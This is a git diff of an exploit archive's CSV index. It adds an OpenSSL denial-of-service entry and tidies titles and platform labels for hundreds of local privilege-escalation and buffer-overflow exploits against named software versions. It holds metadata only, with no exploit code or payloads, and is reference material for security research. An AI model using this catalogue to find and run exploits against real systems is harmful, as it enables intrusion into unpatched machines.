diff --git a/files.csv b/files.csv index df9a65dbf..2d2a04c2f 100644 --- a/files.csv +++ b/files.csv @@ -5348,13 +5348,14 @@ id,file,description,date,author,platform,type,port 41163,platforms/multiple/dos/41163.txt,"macOS 10.12.1 / iOS 10.2 - Kernel Userspace Pointer Memory Corruption",2017-01-26,"Google Security Research",multiple,dos,0 41164,platforms/multiple/dos/41164.c,"macOS 10.12.1 / iOS Kernel - 'IOService::matchPassive' Use-After-Free",2017-01-26,"Google Security Research",multiple,dos,0 41165,platforms/multiple/dos/41165.c,"macOS 10.12.1 / iOS Kernel - 'host_self_trap' Use-After-Free",2017-01-26,"Google Security Research",multiple,dos,0 +41192,platforms/multiple/dos/41192.c,"OpenSSL 1.1.0 - Remote Client Denial of Service",2017-01-26,"Guido Vranken",multiple,dos,0 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0 15,platforms/osx/local/15.c,"Apple Mac OSX 10.2.4 - DirectoryService (PATH) Privilege Escalation",2003-04-18,"Neeko Oni",osx,local,0 21,platforms/linux/local/21.c,"Qpopper 4.0.x - poppassd Privilege Escalation",2003-04-29,Xpl017Elz,linux,local,0 29,platforms/bsd/local/29.c,"Firebird 1.0.2 FreeBSD 4.7-RELEASE - Privilege Escalation",2003-05-12,bob,bsd,local,0 -31,platforms/linux/local/31.pl,"CDRTools CDRecord 2.0 - Mandrake Privilege Escalation",2003-05-14,anonymous,linux,local,0 +31,platforms/linux/local/31.pl,"CDRTools CDRecord 2.0 (Mandrake / Slackware) - Privilege Escalation",2003-05-14,anonymous,linux,local,0 32,platforms/windows/local/32.c,"Microsoft Windows XP - 'explorer.exe' Buffer Overflow",2003-05-21,einstein,windows,local,0 40,platforms/linux/local/40.pl,"Mandrake Linux 8.2 /usr/mail - Local Exploit",2003-06-10,anonymous,linux,local,0 52,platforms/windows/local/52.asm,"ICQ Pro 2003a - Password Bypass Exploit (ca1-icq.asm)",2003-07-09,"Caua Moura Prado",windows,local,0 @@ -5395,7 +5396,7 @@ id,file,description,date,author,platform,type,port 200,platforms/bsd/local/200.c,"BSDi SUIDPerl - Local Stack Buffer Overflow",2000-11-21,vade79,bsd,local,0 202,platforms/bsd/local/202.c,"BSDi 3.0 / 4.0 - rcvtty[mh] Local Exploit",2000-11-21,vade79,bsd,local,0 203,platforms/linux/local/203.sh,"vixie-cron - Privilege Escalation",2000-11-21,"Michal Zalewski",linux,local,0 -205,platforms/linux/local/205.pl,"RedHat 6.2 /usr/bin/rcp - SUID Privilege Escalation Exploit",2000-11-29,Tlabs,linux,local,0 +205,platforms/linux/local/205.pl,"RedHat 6.2 /usr/bin/rcp - SUID Privilege Escalation",2000-11-29,Tlabs,linux,local,0 206,platforms/linux/local/206.c,"dump 0.4b15 (RedHat 6.2) - Exploit",2000-11-29,mat,linux,local,0 207,platforms/bsd/local/207.c,"BSDi 3.0 inc - Buffer Overflow Privilege Escalation",2000-11-30,vade79,bsd,local,0 209,platforms/linux/local/209.c,"GLIBC (via /bin/su) - Privilege Escalation",2000-11-30,localcore,linux,local,0 @@ -5484,8 +5485,8 @@ id,file,description,date,author,platform,type,port 559,platforms/windows/local/559.c,"Zinf Audio Player 2.2.1 - Local Buffer Overflow",2004-09-28,Delikon,windows,local,0 560,platforms/windows/local/560.txt,"GlobalScape - CuteFTP macros (.mcr) Local",2004-09-28,ATmaCA,windows,local,0 579,platforms/bsd/local/579.sh,"BSD bmon 1.2.1_2 - Local Exploit",2004-10-16,"Idan Nahoum",bsd,local,0 -586,platforms/linux/local/586.c,"BitchX 1.0c19 - Privilege Escalation (suid?)",2004-10-20,Sha0,linux,local,0 -587,platforms/linux/local/587.c,"Apache 1.3.31 (mod_include) - Local Buffer Overflow",2004-10-21,xCrZx,linux,local,0 +586,platforms/linux/local/586.c,"BitchX 1.0c19 - Privilege Escalation",2004-10-20,Sha0,linux,local,0 +587,platforms/linux/local/587.c,"Apache 1.3.31 mod_include - Local Buffer Overflow",2004-10-21,xCrZx,linux,local,0 591,platforms/linux/local/591.c,"socat 1.4.0.2 - Local Format String (not setuid)",2004-10-23,CoKi,linux,local,0 600,platforms/linux/local/600.c,"GD Graphics Library - Heap Overflow (PoC)",2004-10-26,anonymous,linux,local,0 601,platforms/linux/local/601.c,"libxml 2.6.12 nanoftp - Remote Buffer Overflow (PoC)",2004-10-26,infamous41md,linux,local,0 @@ -5500,7 +5501,7 @@ id,file,description,date,author,platform,type,port 695,platforms/linux/local/695.c,"Cscope 15.5 - Symlink Exploit",2004-12-17,Gangstuck,linux,local,0 698,platforms/ultrix/local/698.c,"Ultrix 4.5/MIPS - dxterm 0 Local Buffer Overflow",2004-12-20,"Kristoffer BrÃ¥nemyr",ultrix,local,0 699,platforms/aix/local/699.c,"AIX 5.1 < 5.3 - paginit Local Stack Overflow",2004-12-20,cees-bart,aix,local,0 -701,platforms/aix/local/701.sh,"AIX 4.3/5.1 < 5.3 - lsmcode Command Execution Privilege Escalation",2004-12-21,cees-bart,aix,local,0 +701,platforms/aix/local/701.sh,"AIX 4.3/5.1 < 5.3 - 'lsmcode' Command Execution Privilege Escalation",2004-12-21,cees-bart,aix,local,0 713,platforms/solaris/local/713.c,"Solaris 7/8/9 CDE LibDTHelp - Local Buffer Overflow (1)",2004-12-24,"Marco Ivaldi",solaris,local,0 714,platforms/solaris/local/714.c,"Solaris 7/8/9 CDE LibDTHelp - Local Buffer Overflow (2)",2004-12-24,"Marco Ivaldi",solaris,local,0 715,platforms/solaris/local/715.c,"Solaris 8/9 - passwd circ() Privilege Escalation",2004-12-24,"Marco Ivaldi",solaris,local,0 @@ -5596,7 +5597,7 @@ id,file,description,date,author,platform,type,port 1154,platforms/linux/local/1154.pl,"Operator Shell (osh) 1.7-13 - Privilege Escalation",2005-08-16,"Charles Stevenson",linux,local,0 1161,platforms/windows/local/1161.c,"BakBone NetVault 7.1 - Privilege Escalation",2005-04-27,"Reed Arvin",windows,local,0 1168,platforms/windows/local/1168.c,"WinAce 2.6.0.5 - Temporary File Parsing Buffer Overflow",2005-08-19,ATmaCA,windows,local,0 -1170,platforms/linux/local/1170.c,"Debian 2.2 - /usr/bin/pileup Privilege Escalation",2001-07-13,"Charles Stevenson",linux,local,0 +1170,platforms/linux/local/1170.c,"Debian 2.2 /usr/bin/pileup - Privilege Escalation",2001-07-13,"Charles Stevenson",linux,local,0 1173,platforms/windows/local/1173.c,"Mercora IMRadio 4.0.0.0 - Local Password Disclosure",2005-08-22,Kozan,windows,local,0 1174,platforms/windows/local/1174.c,"ZipTorrent 1.3.7.3 - Local Proxy Password Disclosure",2005-08-22,Kozan,windows,local,0 1181,platforms/linux/local/1181.c,"MySQL 4.0.17 (Linux) - User-Defined Function (UDF) Dynamic Library Exploit (1)",2004-12-24,"Marco Ivaldi",linux,local,0 @@ -5770,7 +5771,7 @@ id,file,description,date,author,platform,type,port 3439,platforms/windows/local/3439.php,"PHP 4.4.6 - snmpget() object id Local Buffer Overflow (PoC)",2007-03-09,rgod,windows,local,0 3440,platforms/linux/local/3440.php,"PHP 5.2.0 / PHP with PECL ZIP 1.8.3 - zip:// URL Wrapper Buffer Overflow",2007-03-09,"Stefan Esser",linux,local,0 3442,platforms/multiple/local/3442.php,"PHP 4.4.6 - cpdf_open() Local Source Code Disclosure (PoC)",2007-03-09,rgod,multiple,local,0 -3451,platforms/windows/local/3451.c,"Oracle 10g (Windows x86) - (PROCESS_DUP_HANDLE) Local Privilege Elevation",2007-03-10,"Cesar Cerrudo",windows,local,0 +3451,platforms/win_x86/local/3451.c,"Oracle 10g (Windows x86) - (PROCESS_DUP_HANDLE) Local Privilege Elevation",2007-03-10,"Cesar Cerrudo",win_x86,local,0 3460,platforms/osx/local/3460.php,"PHP 5.2.0 (OSX) - EXT/Filter Space Trimming Buffer Underflow Exploit",2007-03-12,"Stefan Esser",osx,local,0 3479,platforms/linux/local/3479.php,"PHP 5.2.1 - session_regenerate_id() Double-Free Exploit",2007-03-14,"Stefan Esser",linux,local,0 3480,platforms/linux/local/3480.php,"PHP 5.2.0/5.2.1 - Rejected Session ID Double-Free Exploit",2007-03-14,"Stefan Esser",linux,local,0 @@ -5812,9 +5813,9 @@ id,file,description,date,author,platform,type,port 3812,platforms/windows/local/3812.c,"Photoshop CS2/CS3 / Paint Shop Pro 11.20 - '.png' Buffer Overflow",2007-04-27,Marsu,windows,local,0 3823,platforms/windows/local/3823.c,"Winamp 5.34 - '.mp4' Code Execution",2007-04-30,Marsu,windows,local,0 3856,platforms/windows/local/3856.htm,"East Wind Software - 'advdaudio.ocx 1.5.1.1' Local Buffer Overflow",2007-05-05,shinnai,windows,local,0 -3888,platforms/windows/local/3888.c,"GIMP 2.2.14 (Windows x86) - '.ras' Download/Execute Buffer Overflow",2007-05-09,"Kristian Hermansen",windows,local,0 +3888,platforms/win_x86/local/3888.c,"GIMP 2.2.14 (Windows x86) - '.ras' Download/Execute Buffer Overflow",2007-05-09,"Kristian Hermansen",win_x86,local,0 3897,platforms/windows/local/3897.c,"eTrust AntiVirus Agent r8 - Local Privilege Elevation Exploit",2007-05-11,binagres,windows,local,0 -3912,platforms/windows/local/3912.c,"Notepad++ 4.1 (Windows x86) - '.ruby' File Processing Buffer Overflow",2007-05-12,vade79,windows,local,0 +3912,platforms/win_x86/local/3912.c,"Notepad++ 4.1 (Windows x86) - '.ruby' File Processing Buffer Overflow",2007-05-12,vade79,win_x86,local,0 3975,platforms/windows/local/3975.c,"MagicISO 5.4 (build239) - '.cue' File Local Buffer Overflow",2007-05-23,vade79,windows,local,0 3985,platforms/osx/local/3985.txt,"Apple Mac OSX 10.4.8 - pppd Plugin Loading Privilege Escalation",2007-05-25,qaaz,osx,local,0 4001,platforms/windows/local/4001.cpp,"UltraISO 8.6.2.2011 - '.cue/'.bin' Local Buffer Overflow (1)",2007-05-28,n00b,windows,local,0 @@ -5834,7 +5835,7 @@ id,file,description,date,author,platform,type,port 4229,platforms/windows/local/4229.pl,"CrystalPlayer 1.98 - '.mls' Local Buffer Overflow",2007-07-26,"Arham Muhammad",windows,local,0 4231,platforms/aix/local/4231.c,"IBM AIX 5.3 sp6 - capture Terminal Sequence Privilege Escalation",2007-07-27,qaaz,aix,local,0 4232,platforms/aix/local/4232.sh,"IBM AIX 5.3 sp6 - pioout Arbitrary Library Loading Privilege Escalation",2007-07-27,qaaz,aix,local,0 -4233,platforms/aix/local/4233.c,"IBM AIX 5.3 sp6 - ftp gets() Privilege Escalation",2007-07-27,qaaz,aix,local,0 +4233,platforms/aix/local/4233.c,"IBM AIX 5.3 SP6 - FTP gets() Privilege Escalation",2007-07-27,qaaz,aix,local,0 4236,platforms/windows/local/4236.php,"PHP 5.x - (Win32service) Local Safe Mode Bypass Exploit",2007-07-27,NetJackal,windows,local,0 4252,platforms/windows/local/4252.c,"Live for Speed S1/S2/Demo - '.mpr replay' Buffer Overflow",2007-08-01,n00b,windows,local,0 4257,platforms/windows/local/4257.c,"Panda AntiVirus 2008 - Privilege Escalation",2007-08-05,tarkus,windows,local,0 @@ -5866,7 +5867,7 @@ id,file,description,date,author,platform,type,port 4572,platforms/multiple/local/4572.txt,"Oracle 10g - LT.FINDRICSET SQL Injection (IDS evasion)",2007-10-27,sh2kerr,multiple,local,0 4583,platforms/windows/local/4583.py,"Sony CONNECT Player 4.x - '.m3u' Local Stack Overflow",2007-10-29,TaMBaRuS,windows,local,0 4584,platforms/windows/local/4584.c,"Kodak Image Viewer - TIF/TIFF Code Execution (PoC) (MS07-055)",2007-10-29,"Gil-Dong / Woo-Chi",windows,local,0 -4612,platforms/aix/local/4612.py,"IBM AIX 5.3.0 - setlocale() Privilege Escalation",2007-11-07,"Thomas Pollet",aix,local,0 +4612,platforms/aix/local/4612.py,"IBM AIX 5.3.0 - 'setlocale()' Privilege Escalation",2007-11-07,"Thomas Pollet",aix,local,0 4625,platforms/windows/local/4625.txt,"Microsoft Jet Engine - '.MDB' File Parsing Stack Overflow (PoC)",2007-11-16,cocoruder,windows,local,0 4698,platforms/linux/local/4698.c,"Send ICMP Nasty Garbage (sing) - Append File Logrotate Exploit",2007-12-06,bannedit,linux,local,0 4701,platforms/windows/local/4701.pl,"Media Player Classic 6.4.9 - '.MP4' File Stack Overflow",2007-12-08,"SYS 49152",windows,local,0 @@ -5958,7 +5959,7 @@ id,file,description,date,author,platform,type,port 7547,platforms/windows/local/7547.py,"CoolPlayer 2.19 - '.Skin' Local Buffer Overflow (Python)",2008-12-22,Encrypt3d.M!nd,windows,local,0 7550,platforms/multiple/local/7550.c,"CUPS < 1.3.8-4 - Privilege Escalation",2008-12-22,"Jon Oberheide",multiple,local,0 7577,platforms/windows/local/7577.pl,"Acoustica Mixcraft 4.2 - Universal Stack Overflow (SEH)",2008-12-24,SkD,windows,local,0 -7581,platforms/freebsd/local/7581.c,"FreeBSD 6x/7 - protosw kernel Local Privilege Escalation Exploit",2008-12-28,"Don Bailey",freebsd,local,0 +7581,platforms/freebsd/local/7581.c,"FreeBSD 6x/7 protosw Kernel - Privilege Escalation",2008-12-28,"Don Bailey",freebsd,local,0 7582,platforms/windows/local/7582.py,"IntelliTamper 2.07/2.08 - '.map' Local Overwrite (SEH)",2008-12-28,Cnaph,windows,local,0 7608,platforms/windows/local/7608.py,"IntelliTamper 2.07/2.08 - (ProxyLogin) Local Stack Overflow",2008-12-29,His0k4,windows,local,0 7618,platforms/linux/local/7618.c,"Linux Kernel < 2.6.26.4 - SCTP Kernel Memory Disclosure",2008-12-29,"Jon Oberheide",linux,local,0 @@ -6111,7 +6112,7 @@ id,file,description,date,author,platform,type,port 8782,platforms/windows/local/8782.txt,"ArcaVir 2009 < 9.4.320X.9 - 'ps_drv.sys' Privilege Escalation",2009-05-26,"NT Internals",windows,local,0 8783,platforms/windows/local/8783.c,"Winamp 5.551 - MAKI Parsing Integer Overflow",2009-05-26,n00b,windows,local,0 8789,platforms/windows/local/8789.py,"Slayer 2.4 - (skin) Universal Buffer Overflow (SEH)",2009-05-26,SuNHouSe2,windows,local,0 -8799,platforms/windows/local/8799.txt,"PHP 5.2.9 (Windows x86) - Local Safemod Bypass Exploit",2009-05-26,Abysssec,windows,local,0 +8799,platforms/win_x86/local/8799.txt,"PHP 5.2.9 (Windows x86) - Local Safemod Bypass Exploit",2009-05-26,Abysssec,win_x86,local,0 8833,platforms/hardware/local/8833.txt,"Linksys WAG54G2 - Web Management Console Arbitrary Command Execution",2009-06-01,Securitum,hardware,local,0 8863,platforms/windows/local/8863.c,"Atomix Virtual Dj Pro 6.0 - Stack Buffer Overflow PoC (SEH)",2009-06-03,"fl0 fl0w",windows,local,0 8875,platforms/windows/local/8875.txt,"Online Armor < 3.5.0.12 - 'OAmon.sys' Privilege Escalation",2009-06-04,"NT Internals",windows,local,0 @@ -6346,7 +6347,7 @@ id,file,description,date,author,platform,type,port 11079,platforms/windows/local/11079.rb,"Audiotran 1.4.1 (Windows XP SP2/SP3 English) - Buffer Overflow",2010-01-10,"Sébastien Duquette",windows,local,0 11093,platforms/windows/local/11093.rb,"Soritong 1.0 - Universal Buffer Overflow SEH (Metasploit)",2010-01-10,fb1h2s,windows,local,0 11109,platforms/windows/local/11109.rb,"Audiotran 1.4.1 - '.pls' Stack Overflow (Metasploit)",2010-01-11,dookie,windows,local,0 -11112,platforms/windows/local/11112.c,"HTMLDOC 1.9.x-r1629 (Windows x86) - Local .html Buffer Overflow",2010-01-11,"fl0 fl0w",windows,local,0 +11112,platforms/win_x86/local/11112.c,"HTMLDOC 1.9.x-r1629 (Windows x86) - Local .html Buffer Overflow",2010-01-11,"fl0 fl0w",win_x86,local,0 11139,platforms/windows/local/11139.c,"Winamp 5.05 < 5.13 - '.ini' Local Stack Buffer Overflow (PoC)",2010-01-14,"fl0 fl0w",windows,local,0 11146,platforms/windows/local/11146.py,"BS.Player 2.51 - Overwrite (SEH)",2010-01-15,"Mert SARICA",windows,local,0 11152,platforms/windows/local/11152.py,"Google SketchUp 7.1.6087 - 'lib3ds' 3DS Importer Memory Corruption",2010-01-16,mr_me,windows,local,0 @@ -6422,7 +6423,7 @@ id,file,description,date,author,platform,type,port 12090,platforms/freebsd/local/12090.txt,"McAfee Email Gateway (formerly IronMail) - Privilege Escalation",2010-04-06,"Nahuel Grisolia",freebsd,local,0 12091,platforms/freebsd/local/12091.txt,"McAfee Email Gateway (formerly IronMail) - Internal Information Disclosure",2010-04-06,"Nahuel Grisolia",freebsd,local,0 12103,platforms/multiple/local/12103.txt,"Local Glibc shared library (.so) 2.11.1 - Exploit",2010-04-07,Rh0,multiple,local,0 -12130,platforms/linux/local/12130.py,"(Linux Kernel 2.6.34-rc3) ReiserFS (RedHat / Ubuntu 9.10) - xattr Privilege Escalation",2010-04-09,"Jon Oberheide",linux,local,0 +12130,platforms/linux/local/12130.py,"(Linux Kernel 2.6.34-rc3) ReiserFS (RedHat / Ubuntu 9.10) - 'xattr' Privilege Escalation",2010-04-09,"Jon Oberheide",linux,local,0 12189,platforms/windows/local/12189.php,"PHP 6.0 Dev - str_transliterate() Buffer Overflow (NX + ASLR Bypass)",2010-04-13,ryujin,windows,local,0 12213,platforms/windows/local/12213.c,"Micropoint ProActive Denfense 'Mp110013.sys' 1.3.10123.0 - Privilege Escalation",2010-04-14,MJ0011,windows,local,0 20109,platforms/windows/local/20109.rb,"Photodex ProShow Producer 5.0.3256 - load File Handling Buffer Overflow (Metasploit)",2012-07-27,Metasploit,windows,local,0 @@ -6694,7 +6695,7 @@ id,file,description,date,author,platform,type,port 16173,platforms/windows/local/16173.py,"AutoPlay 1.33 (autoplay.ini) - Local Buffer Overflow (SEH)",2011-02-15,badc0re,windows,local,0 16253,platforms/windows/local/16253.py,"Elecard AVC_HD/MPEG Player 5.7 - Buffer Overflow",2011-02-27,sickness,windows,local,0 16307,platforms/multiple/local/16307.rb,"PeaZIP 2.6.1 - Zip Processing Command Injection (Metasploit)",2010-09-20,Metasploit,multiple,local,0 -40435,platforms/lin_x86/local/40435.rb,"Linux Kernel 4.6.3 - 'Netfilter' Privilege Escalation (Metasploit)",2016-09-27,Metasploit,lin_x86,local,0 +40435,platforms/lin_x86/local/40435.rb,"Linux Kernel 4.6.3 (x86) - 'Netfilter' Privilege Escalation (Metasploit)",2016-09-27,Metasploit,lin_x86,local,0 16503,platforms/windows/local/16503.rb,"Adobe - Doc.media.newPlayer Use-After-Free (Metasploit) (1)",2010-04-30,Metasploit,windows,local,0 16504,platforms/windows/local/16504.rb,"Adobe - 'util.printf()' Buffer Overflow (Metasploit) (1)",2010-05-03,Metasploit,windows,local,0 16531,platforms/windows/local/16531.rb,"Winamp - Playlist UNC Path Computer Name Overflow (Metasploit)",2010-04-30,Metasploit,windows,local,0 @@ -6771,7 +6772,7 @@ id,file,description,date,author,platform,type,port 16688,platforms/windows/local/16688.rb,"Zinf Audio Player 2.2.1 - '.pls' Stack Buffer Overflow (Metasploit)",2010-11-24,Metasploit,windows,local,0 16940,platforms/windows/local/16940.c,".NET Runtime Optimization Service - Privilege Escalation",2011-03-08,XenoMuta,windows,local,0 16942,platforms/windows/local/16942.pl,"Movavi VideoSuite 8.0 MediaPlayer - '.m3u' Buffer Overflow",2011-03-08,KedAns-Dz,windows,local,0 -16951,platforms/bsd/local/16951.c,"FreeBSD 6.4 - Netgraph Local Privilege Escalation Exploit",2011-03-10,zx2c4,bsd,local,0 +16951,platforms/bsd/local/16951.c,"FreeBSD 6.4 - Netgraph Privilege Escalation",2011-03-10,zx2c4,bsd,local,0 16965,platforms/windows/local/16965.pl,"CoolZip 2.0 - zip Buffer Overflow",2011-03-12,"C4SS!0 G0M3S",windows,local,0 16971,platforms/windows/local/16971.py,"ABBS Audio Media Player - '.m3u' / '.LST' Buffer Overflow",2011-03-14,Rh0,windows,local,0 16976,platforms/windows/local/16976.pl,"ABBS Audio Media Player 3.0 - '.lst' Buffer Overflow (SEH)",2011-03-14,h1ch4m,windows,local,0 @@ -6935,13 +6936,13 @@ id,file,description,date,author,platform,type,port 18808,platforms/windows/local/18808.html,"SAMSUNG NET-i Viewer 1.37 - Overwrite (SEH)",2012-05-01,blake,windows,local,0 18823,platforms/windows/local/18823.txt,"Symantec pcAnywhere - Insecure File Permissions Privilege Escalation",2012-05-02,"Edward Torkington",windows,local,0 18826,platforms/windows/local/18826.py,"AnvSoft Any Video Converter 4.3.6 - Stack Overflow",2012-05-03,cikumel,windows,local,0 -18861,platforms/windows/local/18861.php,"PHP 5.4.3 (Windows x86 Polish) - Code Execution",2012-05-11,0in,windows,local,0 +18861,platforms/win_x86/local/18861.php,"PHP 5.4.3 (Windows x86 Polish) - Code Execution",2012-05-11,0in,win_x86,local,0 18862,platforms/windows/local/18862.php,"Adobe Photoshop CS5.1 - U3D.8BI Collada Asset Elements Stack Overflow",2012-05-11,rgod,windows,local,0 18869,platforms/windows/local/18869.pl,"AnvSoft Any Video Converter 4.3.6 - Unicode Buffer Overflow",2012-05-12,h1ch4m,windows,local,0 18892,platforms/windows/local/18892.txt,"SkinCrafter ActiveX Control 3.0 - Buffer Overflow",2012-05-17,"saurabh sharma",windows,local,0 18905,platforms/windows/local/18905.rb,"Foxit Reader 3.0 - Open Execute Action Stack Based Buffer Overflow (Metasploit)",2012-05-21,Metasploit,windows,local,0 18914,platforms/windows/local/18914.py,"Novell Client 4.91 SP4 - Privilege Escalation",2012-05-22,sickness,windows,local,0 -18917,platforms/linux/local/18917.txt,"Apache (Mod_Auth_OpenID) - Session Stealing",2012-05-24,"Peter Ellehauge",linux,local,0 +18917,platforms/linux/local/18917.txt,"Apache Mod_Auth_OpenID - Session Stealing",2012-05-24,"Peter Ellehauge",linux,local,0 18923,platforms/windows/local/18923.rb,"OpenOffice - OLE Importer DocumentSummaryInformation Stream Handling Overflow (Metasploit)",2012-05-25,Metasploit,windows,local,0 18981,platforms/windows/local/18981.txt,"Sysax 5.60 - Create SSL Certificate Buffer Overflow",2012-06-04,"Craig Freyman",windows,local,0 18947,platforms/windows/local/18947.rb,"ispVM System - '.XCF' File Handling Overflow (Metasploit)",2012-05-29,Metasploit,windows,local,0 @@ -7689,7 +7690,7 @@ id,file,description,date,author,platform,type,port 22246,platforms/hp-ux/local/22246.c,"HP-UX 10.x - stmkfont Alternate Typeface Library Buffer Overflow (1)",2003-02-12,"Last Stage of Delirium",hp-ux,local,0 22247,platforms/hp-ux/local/22247.sh,"HP-UX 10.x - stmkfont Alternate Typeface Library Buffer Overflow (2)",2003-02-20,watercloud,hp-ux,local,0 22248,platforms/hp-ux/local/22248.sh,"HP-UX 10.x - rs.F3000 Unspecified Unauthorized Access",2003-02-12,"Last Stage of Delirium",hp-ux,local,0 -22265,platforms/linux/local/22265.pl,"cPanel 5.0 - Openwebmail Privilege Escalation",2003-02-19,deadbeat,linux,local,0 +22265,platforms/linux/local/22265.pl,"cPanel 5.0 - 'Openwebmail' Privilege Escalation",2003-02-19,deadbeat,linux,local,0 22272,platforms/multiple/local/22272.pl,"Perl2Exe 1.0 9/5.0 2/6.0 - Code Obfuscation",2002-02-22,"Simon Cozens",multiple,local,0 22332,platforms/unix/local/22332.c,"BSD lpr 2000.05.07/0.48/0.72 / lpr-ppd 0.72 - Local Buffer Overflow (2)",1998-04-22,CMN,unix,local,0 22331,platforms/unix/local/22331.c,"BSD lpr 2000.05.07/0.48/0.72 / lpr-ppd 0.72 - Local Buffer Overflow (1)",1998-04-22,"Niall Smart",unix,local,0 @@ -7839,11 +7840,11 @@ id,file,description,date,author,platform,type,port 23364,platforms/linux/local/23364.sh,"WMAPM 3.1 - Privilege Escalation",2003-11-08,"Knud Erik Hojgaard",linux,local,0 23414,platforms/linux/local/23414.txt,"FVWM 2.4/2.5 - fvwm-menu-Directory Command Execution",2003-12-05,auto22238,linux,local,0 23479,platforms/linux/local/23479.sh,"GNU Indent 2.2.9 - Local Heap Overflow",2003-12-26,"Pooh Hacking Squadron",linux,local,0 -23481,platforms/linux/local/23481.c,"Apache 2.0.4x (mod_php) - File Descriptor Leakage (1)",2003-12-26,"Steve Grubb",linux,local,0 -23482,platforms/linux/local/23482.c,"Apache 2.0.4x (mod_php) - File Descriptor Leakage (2)",2003-12-26,"frauk\x41ser",linux,local,0 +23481,platforms/linux/local/23481.c,"Apache 2.0.4x mod_php - File Descriptor Leakage (1)",2003-12-26,"Steve Grubb",linux,local,0 +23482,platforms/linux/local/23482.c,"Apache 2.0.4x mod_php - File Descriptor Leakage (2)",2003-12-26,"frauk\x41ser",linux,local,0 23510,platforms/linux/local/23510.c,"XSOK 1.0 2 - LANG Environment Variable Local Buffer Overrun",2003-12-30,N2n-Hacker,linux,local,0 23511,platforms/windows/local/23511.txt,"Surfnet 1.31 - Unauthorized Account Depositing",2004-01-02,Rift_XT,windows,local,0 -23581,platforms/linux/local/23581.pl,"Apache 2.0.4x (mod_perl) - File Descriptor Leakage (3)",2004-01-21,"Steve Grubb",linux,local,0 +23581,platforms/linux/local/23581.pl,"Apache 2.0.4x mod_perl - File Descriptor Leakage (3)",2004-01-21,"Steve Grubb",linux,local,0 23609,platforms/unix/local/23609.sh,"IBM Informix Dynamic Server 9.40/Informix Extended Parallel Server 8.40 - Multiple Vulnerabilities (1)",2003-08-08,pask,unix,local,0 23610,platforms/unix/local/23610.c,"IBM Informix Dynamic Server 9.40/Informix Extended Parallel Server 8.40 - Multiple Vulnerabilities (2)",2003-08-08,pask,unix,local,0 23611,platforms/multiple/local/23611.pl,"OracleAS TopLink Mapping Workbench - Weak Encryption Algorithm",2004-01-28,"Pete Finnigan",multiple,local,0 @@ -7880,7 +7881,7 @@ id,file,description,date,author,platform,type,port 24064,platforms/unix/local/24064.pl,"Veritas NetBackup 3.5/4.5/5.0 - Multiple Unspecified Local Memory Corruption Vulnerabilities (3)",2004-04-25,"Secure Network Operations",unix,local,0 24113,platforms/bsd/local/24113.c,"NetBSD/FreeBSD Port Systrace 1.x - Exit Routine Access Validation Privilege Escalation",2004-05-11,"Stefan Esser",bsd,local,0 24123,platforms/linux/local/24123.sh,"WGet 1.x - Insecure File Creation Race Condition",2004-05-17,"Hugo Vazquez",linux,local,0 -24141,platforms/linux/local/24141.txt,"cPanel 5-9 - Privilege Escalation",2004-05-24,"Rob Brown",linux,local,0 +24141,platforms/linux/local/24141.txt,"cPanel 5 < 9 - Privilege Escalation",2004-05-24,"Rob Brown",linux,local,0 24171,platforms/windows/local/24171.c,"SmartStuff FoolProof Security Program 3.9.x - Administrative Password Recovery",2004-06-05,"Cyrillium Security",windows,local,0 24173,platforms/php/local/24173.txt,"PHP 4.3.x - Microsoft Windows Shell Escape functions Command Execution",2004-06-07,"Daniel Fabian",php,local,0 24182,platforms/linux/local/24182.c,"CVS 1.11.x - Multiple Vulnerabilities",2004-06-09,"Gyan Chawdhary",linux,local,0 @@ -7909,7 +7910,7 @@ id,file,description,date,author,platform,type,port 24609,platforms/osx/local/24609.txt,"MacOSXLabs RsyncX 2.1 - Insecure Temporary File Creation",2004-09-17,"Matt Johnston",osx,local,0 24678,platforms/windows/local/24678.txt,"IBM DB2 - Universal Database Information Disclosure",2004-09-01,"Chris Anley",windows,local,0 24682,platforms/windows/local/24682.c,"Microsoft Windows XP - Weak Default Configuration",2004-10-13,americanidiot,windows,local,0 -24694,platforms/linux/local/24694.c,"Apache 1.3.x (mod_include) - Local Buffer Overflow",2004-10-18,xCrZx,linux,local,0 +24694,platforms/linux/local/24694.c,"Apache 1.3.x mod_include - Local Buffer Overflow",2004-10-18,xCrZx,linux,local,0 24746,platforms/lin_x86-64/local/24746.c,"Linux Kernel 3.7.10 (Ubuntu 12.10 x64) - 'sock_diag_handlers' Privilege Escalation (2)",2013-03-13,"Kacper Szczesniak",lin_x86-64,local,0 24749,platforms/linux/local/24749.sh,"Cscope 13.0/15.x - Insecure Temporary File Creation Vulnerabilities (1)",2004-11-17,Gangstuck,linux,local,0 24750,platforms/linux/local/24750.c,"Cscope 13.0/15.x - Insecure Temporary File Creation Vulnerabilities (2)",2004-11-17,Gangstuck,linux,local,0 @@ -7927,7 +7928,7 @@ id,file,description,date,author,platform,type,port 24923,platforms/multiple/local/24923.txt,"Google AD Sync Tool - Exposure of Sensitive Information",2013-04-08,"Sense of Security",multiple,local,0 24929,platforms/linux/local/24929.rb,"HP System Management Homepage - Privilege Escalation (Metasploit)",2013-04-08,Metasploit,linux,local,0 24933,platforms/linux/local/24933.txt,"PonyOS 0.4.99-mlp - Multiple Vulnerabilities",2013-04-08,"John Cartwright",linux,local,0 -25039,platforms/aix/local/25039.txt,"IBM AIX 5.x - Diag Privilege Escalation Vulnerabilities",2004-12-20,cees-bart,aix,local,0 +25039,platforms/aix/local/25039.txt,"IBM AIX 5.x - 'Diag' Privilege Escalation",2004-12-20,cees-bart,aix,local,0 25040,platforms/php/local/25040.php,"PHP 4.x/5.0 Shared Memory Module - Offset Memory Corruption",2004-12-20,"Stefano Di Paola",php,local,0 25055,platforms/osx/local/25055.c,"Darwin Kernel 7.1 - Mach File Parsing Local Integer Overflow",2005-01-19,nemo@felinemenace.org,osx,local,0 25080,platforms/linux/local/25080.txt,"Newsgrab 0.5.0pre4 - Multiple Local And Remote Vulnerabilities",2005-02-02,"Niels Heinen",linux,local,0 @@ -8069,7 +8070,7 @@ id,file,description,date,author,platform,type,port 28955,platforms/windows/local/28955.py,"Internet Haut Debit Mobile PCW_MATMARV1.0.0B03 - Buffer Overflow 